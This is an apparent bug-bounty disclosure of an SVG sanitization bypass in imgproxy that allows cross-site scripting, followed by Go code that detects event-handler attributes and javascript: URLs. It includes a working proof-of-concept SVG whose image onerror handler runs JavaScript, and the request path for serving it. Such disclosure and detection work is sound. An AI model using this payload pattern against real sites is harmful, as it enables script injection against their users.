History: Jan 12, 2023 - 8:42 a.m.

SVG Sanitization Bypass - XSS

2023-01-12 08:42:25
emredurmaz4
www.huntr.dev
17
imgproxy
application
svg
sanitization
bypass
xss
malicious
file
javascript
proof of concept
bug bounty

EPSS: 0.001 (Low), Percentile: 39.4%

Description

In the imgproxy application, we bypassed the SVG sanitization function. In this way, an attacker can craft a malicious SVG file and run JavaScript on the application.

Proof of Concept

Here is the content of the malicious SVG file.

<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>

After that, you can request this SVG file through imgproxy as shown below.

http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg
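The bypass above works because the JavaScript sits in an event-handler attribute on an <image> element rather than in a <script> tag, so a sanitizer that only looks for script elements misses it. As an added illustration of the check a sanitizer needs (written for this page, not imgproxy's own code; imgproxy is written in Go, and the sample document and function names below are constructed), this walks every element and reports the attributes that must be stripped:

```go
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Constructed sample in the shape of the report's payload: an <image> whose
// onerror handler fires as soon as its bogus href fails to load.
const sampleSVG = `<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>`

// unsafeSVGAttrs walks every start tag and returns "element@attribute" for
// each attribute a sanitizer must strip: any on* event handler, on any
// element (the report's bypass lives on <image>, not in a <script> tag), and
// any href/xlink:href carrying a javascript: URL. Entities in attribute
// values are already decoded by encoding/xml, so an encoded colon is caught.
func unsafeSVGAttrs(svg string) ([]string, error) {
	dec := xml.NewDecoder(strings.NewReader(svg))
	var found []string
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return found, nil
		}
		if err != nil {
			return nil, err
		}
		start, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		for _, a := range start.Attr {
			name := strings.ToLower(a.Name.Local) // Local drops the xlink: prefix
			val := strings.ToLower(strings.TrimSpace(a.Value))
			if strings.HasPrefix(name, "on") || (name == "href" && strings.HasPrefix(val, "javascript:")) {
				found = append(found, start.Name.Local+"@"+a.Name.Local)
			}
		}
	}
}

func main() {
	bad, err := unsafeSVGAttrs(sampleSVG)
	fmt.Println(bad, err) // [image@onerror] <nil>
}
```

A real sanitizer should strip (or reject the whole file on) every attribute this returns, rather than allow-listing only the element names it recognises.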
